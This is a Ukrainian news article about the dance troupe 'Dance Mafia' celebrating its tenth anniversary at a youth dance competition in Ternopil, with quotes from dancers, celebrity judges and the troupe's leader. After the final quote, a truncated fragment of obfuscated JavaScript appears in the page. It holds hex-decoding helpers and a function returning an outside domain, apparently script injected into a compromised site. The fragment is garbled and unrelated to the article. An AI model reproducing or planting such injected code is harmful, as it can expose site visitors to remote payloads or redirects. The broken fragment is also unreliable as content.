Ви знаходитесь: Головна / Новини / «Dance Mafia» гучно відсвяткувала десятий день народження

«Dance Mafia» гучно відсвяткувала десятий день народження

4 та 5 червня Тернопіль став танцювальною столицею України. В одному з концерт-холів міста юні танцюристи з різних куточків країни демонстрували свою майстерність. З дев’ятої ранку і до пізнього вечора змагалися у різних стилях, серед яких джаз-фанк, диско та хіп хоп.

СОФІЯ, танцює в колективі «Dance Mafia»

«Сучасні танці – це якось можливість направити свою енергію в правильне русло».

ЛІЗА, танцює в колективі «Dance Mafia»

«Я перепробувала багато танців, але ці мені сподобалися найбільше».

Серед гостей, а водночас і суддів змагань – зірки телешоу восьмого сезону «Танцюють всі» Христина Заєць та Станіслав Турмовіч.

СТАНІСЛАВ ТУРМОВІЧ, учасник восьмого сезону «Танцюють всі»

 «Был много где уже и сегодня это более высокий уровень, где я был. Понятно, есть какие-то нюансы. Некоторые дети немножко не понимают, что они делают, но они делают. Но мне сегодня не хватает в некоторых командах уверенности. Тоесть, хореография есть, но такой дерзости, уверенности, это я еще раз говорю, это сугубо мое мнение, это некоторые команды, это не все. А вообще, настроение классное, underground, все качает, все то, что надо».

ХРИСТИНА ЗАЄЦЬ, учасниця восьмого сезону «Танцюють всі»

«Те, що ми бачимо сьогодні – це великий труд, який показали нам команди. Це є реально достойний рівень. Я була на багатьох фестивалях в Україні і за межами України і я сьогодні дуже приємно здивована. Я взяла для себе багато нового, зарядилася, взяла якесь натхнення».

Святковий настрій змаганням додавала визначна подія для танцювального колективу «Dance Mafia», він відзначав свій ювілей, 10-й рік народження.

ЮЛІЯ ПІДГАЙНА, керівник танцювального колективу «Dance Mafia»

«За цих 10 років ми виховали дуже багато призерів та чемпіонів, чим дуже сильно гордимося. В нас велика танцювальна сімя, в якій танцює в Тернопільській області близько 600 дітей. Це діти не лише з Тернополя, а зі Збаража та Теребовлі».

ЮЛІЯ, танцює в колективі «Dance Mafia»

«В нас колектив дуже дружній, веселий і нам дуже пощастило з ним. Багато учасників, взагалі, талановиті дуже діти».

НЖЕЛІКА, танцює в колективі «Dance Mafia»

«Щоб побільше вигравали, щоб більше перемог, більше дітей і найкращого всього».

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “intb.te.ua”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

Автор: Оксана Максимлюк

Оксана Максимлюк

1 коментар

  1. Було дуже крутоооо!!! Я із Хмельницька приїхала на змагання і отримала нереальні враження

Залишити коментар

Ваша електронну адресу не буде опубліковано. Обов’язкові для заповнення поля позначені *

*

Scroll To Top